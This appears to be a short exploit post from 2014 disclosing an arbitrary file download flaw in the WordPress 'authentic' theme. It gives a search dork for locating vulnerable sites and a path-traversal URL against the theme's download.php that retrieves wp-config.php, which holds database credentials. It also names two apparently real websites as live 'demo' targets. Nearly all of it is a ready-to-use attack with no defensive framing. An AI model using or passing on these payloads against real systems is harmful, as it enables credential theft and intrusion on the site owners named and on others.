facebook facebook twitter rss

Wordpress authentic <= Arbitrary File Download

Author: wlhaan hacker , Published: 09-10-2014
######################

# Exploit Title : Wordpress authentic <= Arbitrary File Download



# Exploit Author : wlhaan hacker



# Vendor Homepage : https://www.authenticthemes.com/


dork

inurl:"wp-content/themes/authentic/"



# Tested on : Windows 7 / Mozilla Firefox

Linux / Mozilla Firef


######################



# PoC



http://victim/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php


# demo

http://www.pillarhoodriver.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php

http://warrenalliance.org/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php


enjoy:)

#####################
Discovered By : wlhaan hacker

??? ?? ????? ???? ??? ?????


https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani

#####################

Like us on Facebook :